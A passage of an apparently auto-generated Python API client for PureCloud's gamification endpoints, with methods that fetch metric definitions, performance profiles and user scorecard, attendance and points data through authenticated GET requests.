auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_metricdefinition(self, metric_definition_id, **kwargs):
"""
Metric definition by id
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_metricdefinition(metric_definition_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str metric_definition_id: metric definition id (required)
:return: MetricDefinition
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['metric_definition_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_metricdefinition" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'metric_definition_id' is set
if ('metric_definition_id' not in params) or (params['metric_definition_id'] is None):
raise ValueError("Missing the required parameter `metric_definition_id` when calling `get_gamification_metricdefinition`")
resource_path = '/api/v2/gamification/metricdefinitions/{metricDefinitionId}'.replace('{format}', 'json')
path_params = {}
if 'metric_definition_id' in params:
path_params['metricDefinitionId'] = params['metric_definition_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='MetricDefinition',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_metricdefinitions(self, **kwargs):
"""
All metric definitions
Retrieves the metric definitions and their corresponding default objectives used to create a gamified metric
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_metricdefinitions(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: GetMetricDefinitionsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_metricdefinitions" % key
)
params[key] = val
del params['kwargs']
resource_path = '/api/v2/gamification/metricdefinitions'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetMetricDefinitionsResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_metrics(self, **kwargs):
"""
All gamified metrics for a given profile
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_metrics(callback=callback_function)
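>>>
>>> # Synchronous usage sketch; the profile id below is a placeholder value.
>>> # Omitting performance_profile_id queries the DEFAULT profile.
>>> metrics = api.get_gamification_metrics(performance_profile_id="profile-id")
>>> pprint(metrics)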
:param callback function: The callback function
for asynchronous request. (optional)
:param str performance_profile_id: The profile id of the metrics you are trying to retrieve. The DEFAULT profile is used if nothing is given.
:return: GetMetricsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['performance_profile_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_metrics" % key
)
params[key] = val
del params['kwargs']
resource_path = '/api/v2/gamification/metrics'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'performance_profile_id' in params:
query_params['performanceProfileId'] = params['performance_profile_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetMetricsResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_profile(self, performance_profile_id, **kwargs):
"""
Performance profile by id
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_profile(performance_profile_id, callback=callback_function)
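>>>
>>> # Synchronous usage sketch; "profile-id" below is a placeholder value:
>>> profile = api.get_gamification_profile("profile-id")
>>> pprint(profile)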
:param callback function: The callback function
for asynchronous request. (optional)
:param str performance_profile_id: Performance Profile Id (required)
:return: PerformanceProfile
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['performance_profile_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_profile" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'performance_profile_id' is set
if ('performance_profile_id' not in params) or (params['performance_profile_id'] is None):
raise ValueError("Missing the required parameter `performance_profile_id` when calling `get_gamification_profile`")
resource_path = '/api/v2/gamification/profiles/{performanceProfileId}'.replace('{format}', 'json')
path_params = {}
if 'performance_profile_id' in params:
path_params['performanceProfileId'] = params['performance_profile_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PerformanceProfile',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_profiles(self, **kwargs):
"""
All performance profiles
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_profiles(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: GetProfilesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_profiles" % key
)
params[key] = val
del params['kwargs']
resource_path = '/api/v2/gamification/profiles'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetProfilesResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards(self, workday, **kwargs):
"""
Workday performance metrics of the requesting user
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards(workday, callback=callback_function)
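>>>
>>> # Synchronous usage sketch; the workday and expand values below are placeholders:
>>> scorecard = api.get_gamification_scorecards("2021-01-15", expand=["objectives"])
>>> pprint(scorecard)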
:param callback function: The callback function
for asynchronous request. (optional)
:param date workday: Target querying workday. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param list[str] expand: Which fields, if any, to expand.
:return: WorkdayMetricListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workday', 'expand']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workday' is set
if ('workday' not in params) or (params['workday'] is None):
raise ValueError("Missing the required parameter `workday` when calling `get_gamification_scorecards`")
resource_path = '/api/v2/gamification/scorecards'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'workday' in params:
query_params['workday'] = params['workday']
if 'expand' in params:
query_params['expand'] = params['expand']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WorkdayMetricListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards_attendance(self, start_workday, end_workday, **kwargs):
"""
Attendance status metrics of the requesting user
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards_attendance(start_workday, end_workday, callback=callback_function)
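>>>
>>> # Synchronous usage sketch; the ISO-8601 workday strings below are placeholders:
>>> attendance = api.get_gamification_scorecards_attendance("2021-01-01", "2021-01-31")
>>> pprint(attendance)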
:param callback function: The callback function
for asynchronous request. (optional)
:param date start_workday: Start workday of querying workdays range. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param date end_workday: End workday of querying workdays range. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:return: AttendanceStatusListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['start_workday', 'end_workday']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards_attendance" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'start_workday' is set
if ('start_workday' not in params) or (params['start_workday'] is None):
raise ValueError("Missing the required parameter `start_workday` when calling `get_gamification_scorecards_attendance`")
# verify the required parameter 'end_workday' is set
if ('end_workday' not in params) or (params['end_workday'] is None):
raise ValueError("Missing the required parameter `end_workday` when calling `get_gamification_scorecards_attendance`")
resource_path = '/api/v2/gamification/scorecards/attendance'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'start_workday' in params:
query_params['startWorkday'] = params['start_workday']
if 'end_workday' in params:
query_params['endWorkday'] = params['end_workday']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AttendanceStatusListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards_bestpoints(self, **kwargs):
"""
Best points of the requesting user
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards_bestpoints(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: UserBestPoints
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards_bestpoints" % key
)
params[key] = val
del params['kwargs']
resource_path = '/api/v2/gamification/scorecards/bestpoints'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserBestPoints',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards_points_alltime(self, end_workday, **kwargs):
"""
All-time points of the requesting user
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards_points_alltime(end_workday, callback=callback_function)
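>>>
>>> # Synchronous usage sketch; the end workday below is a placeholder value:
>>> all_time = api.get_gamification_scorecards_points_alltime("2021-01-31")
>>> pprint(all_time)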
:param callback function: The callback function
for asynchronous request. (optional)
:param date end_workday: End workday of querying workdays range. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:return: AllTimePoints
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['end_workday']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards_points_alltime" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'end_workday' is set
if ('end_workday' not in params) or (params['end_workday'] is None):
raise ValueError("Missing the required parameter `end_workday` when calling `get_gamification_scorecards_points_alltime`")
resource_path = '/api/v2/gamification/scorecards/points/alltime'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'end_workday' in params:
query_params['endWorkday'] = params['end_workday']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AllTimePoints',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards_points_average(self, workday, **kwargs):
"""
Average points of the requesting user's division
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards_points_average(workday, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param date workday: The target workday. Dates are represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:return: SingleWorkdayAveragePoints
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workday']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards_points_average" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workday' is set
if ('workday' not in params) or (params['workday'] is None):
raise ValueError("Missing the required parameter `workday` when calling `get_gamification_scorecards_points_average`")
resource_path = '/api/v2/gamification/scorecards/points/average'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'workday' in params:
query_params['workday'] = params['workday']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SingleWorkdayAveragePoints',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards_points_trends(self, start_workday, end_workday, **kwargs):
"""
Points trends of the requesting user
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards_points_trends(start_workday, end_workday, callback=callback_function)
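>>>
>>> # Synchronous usage sketch; the dates and day_of_week value below are placeholders:
>>> trend = api.get_gamification_scorecards_points_trends("2021-01-01", "2021-01-31", day_of_week="Monday")
>>> pprint(trend)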
:param callback function: The callback function
for asynchronous request. (optional)
:param date start_workday: Start workday of querying workdays range. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param date end_workday: End workday of querying workdays range. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param str day_of_week: Optional filter to specify which days of the week to include in the response
:return: WorkdayPointsTrend
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['start_workday', 'end_workday', 'day_of_week']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards_points_trends" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'start_workday' is set
if ('start_workday' not in params) or (params['start_workday'] is None):
raise ValueError("Missing the required parameter `start_workday` when calling `get_gamification_scorecards_points_trends`")
# verify the required parameter 'end_workday' is set
if ('end_workday' not in params) or (params['end_workday'] is None):
raise ValueError("Missing the required parameter `end_workday` when calling `get_gamification_scorecards_points_trends`")
resource_path = '/api/v2/gamification/scorecards/points/trends'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'start_workday' in params:
query_params['startWorkday'] = params['start_workday']
if 'end_workday' in params:
query_params['endWorkday'] = params['end_workday']
if 'day_of_week' in params:
query_params['dayOfWeek'] = params['day_of_week']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WorkdayPointsTrend',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards_user(self, user_id, workday, **kwargs):
"""
Workday performance metrics for a user
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards_user(user_id, workday, callback=callback_function)
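>>>
>>> # Synchronous usage sketch; the user id and workday below are placeholder values:
>>> user_scorecard = api.get_gamification_scorecards_user("user-id", "2021-01-15")
>>> pprint(user_scorecard)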
:param callback function: The callback function
for asynchronous request. (optional)
:param str user_id: (required)
:param date workday: Target querying workday. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param list[str] expand: Which fields, if any, to expand.
:return: WorkdayMetricListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['user_id', 'workday', 'expand']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards_user" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'user_id' is set
if ('user_id' not in params) or (params['user_id'] is None):
raise ValueError("Missing the required parameter `user_id` when calling `get_gamification_scorecards_user`")
# verify the required parameter 'workday' is set
if ('workday' not in params) or (params['workday'] is None):
raise ValueError("Missing the required parameter `workday` when calling `get_gamification_scorecards_user`")
resource_path = '/api/v2/gamification/scorecards/users/{userId}'.replace('{format}', 'json')
path_params = {}
if 'user_id' in params:
path_params['userId'] = params['user_id']
query_params = {}
if 'workday' in params:
query_params['workday'] = params['workday']
if 'expand' in params:
query_params['expand'] = params['expand']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WorkdayMetricListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards_user_attendance(self, user_id, start_workday, end_workday, **kwargs):
"""
Attendance status metrics for a user
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards_user_attendance(user_id, start_workday, end_workday, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str user_id: (required)
:param date start_workday: Start workday of querying workdays range. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param date end_workday: End workday of querying workdays range. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:return: AttendanceStatusListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['user_id', 'start_workday', 'end_workday']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards_user_attendance" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'user_id' is set
if ('user_id' not in params) or (params['user_id'] is None):
raise ValueError("Missing the required parameter `user_id` when calling `get_gamification_scorecards_user_attendance`")
# verify the required parameter 'start_workday' is set
if ('start_workday' not in params) or (params['start_workday'] is None):
raise ValueError("Missing the required parameter `start_workday` when calling `get_gamification_scorecards_user_attendance`")
# verify the required parameter 'end_workday' is set
if ('end_workday' not in params) or (params['end_workday'] is None):
raise ValueError("Missing the required parameter `end_workday` when calling `get_gamification_scorecards_user_attendance`")
resource_path = '/api/v2/gamification/scorecards/users/{userId}/attendance'.replace('{format}', 'json')
path_params = {}
if 'user_id' in params:
path_params['userId'] = params['user_id']
query_params = {}
if 'start_workday' in params:
query_params['startWorkday'] = params['start_workday']
if 'end_workday' in params:
query_params['endWorkday'] = params['end_workday']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AttendanceStatusListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards_user_bestpoints(self, user_id, **kwargs):
"""
Best points of a user
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards_user_bestpoints(user_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str user_id: (required)
:return: UserBestPoints
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['user_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards_user_bestpoints" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'user_id' is set
if ('user_id' not in params) or (params['user_id'] is None):
raise ValueError("Missing the required parameter `user_id` when calling `get_gamification_scorecards_user_bestpoints`")
resource_path = '/api/v2/gamification/scorecards/users/{userId}/bestpoints'.replace('{format}', 'json')
path_params = {}
if 'user_id' in params:
path_params['userId'] = params['user_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserBestPoints',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards_user_points_alltime(self, user_id, end_workday, **kwargs):
"""
All-time points for a user
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards_user_points_alltime(user_id, end_workday, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str user_id: (required)
:param date end_workday: End workday of querying workdays range. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:return: AllTimePoints
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['user_id', 'end_workday']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards_user_points_alltime" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'user_id' is set
if ('user_id' not in params) or (params['user_id'] is None):
raise ValueError("Missing the required parameter `user_id` when calling `get_gamification_scorecards_user_points_alltime`")
# verify the required parameter 'end_workday' is set
if ('end_workday' not in params) or (params['end_workday'] is None):
raise ValueError("Missing the required parameter `end_workday` when calling `get_gamification_scorecards_user_points_alltime`")
resource_path = '/api/v2/gamification/scorecards/users/{userId}/points/alltime'.replace('{format}', 'json')
path_params = {}
if 'user_id' in params:
path_params['userId'] = params['user_id']
query_params = {}
if 'end_workday' in params:
query_params['endWorkday'] = params['end_workday']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AllTimePoints',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards_user_points_trends(self, user_id, start_workday, end_workday, **kwargs):
"""
Points trend for a user
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards_user_points_trends(user_id, start_workday, end_workday, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str user_id: (required)
:param date start_workday: Start workday of querying workdays range. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param date end_workday: End workday of querying workdays range. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param str day_of_week: Optional filter to specify which days of the week to include in the response
:return: WorkdayPointsTrend
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['user_id', 'start_workday', 'end_workday', 'day_of_week']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards_user_points_trends" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'user_id' is set
if ('user_id' not in params) or (params['user_id'] is None):
raise ValueError("Missing the required parameter `user_id` when calling `get_gamification_scorecards_user_points_trends`")
# verify the required parameter 'start_workday' is set
if ('start_workday' not in params) or (params['start_workday'] is None):
raise ValueError("Missing the required parameter `start_workday` when calling `get_gamification_scorecards_user_points_trends`")
# verify the required parameter 'end_workday' is set
if ('end_workday' not in params) or (params['end_workday'] is None):
raise ValueError("Missing the required parameter `end_workday` when calling `get_gamification_scorecards_user_points_trends`")
resource_path = '/api/v2/gamification/scorecards/users/{userId}/points/trends'.replace('{format}', 'json')
path_params = {}
if 'user_id' in params:
path_params['userId'] = params['user_id']
query_params = {}
if 'start_workday' in params:
query_params['startWorkday'] = params['start_workday']
if 'end_workday' in params:
query_params['endWorkday'] = params['end_workday']
if 'day_of_week' in params:
query_params['dayOfWeek'] = params['day_of_week']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WorkdayPointsTrend',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards_user_values_trends(self, user_id, start_workday, end_workday, **kwargs):
"""
Values trends of a user
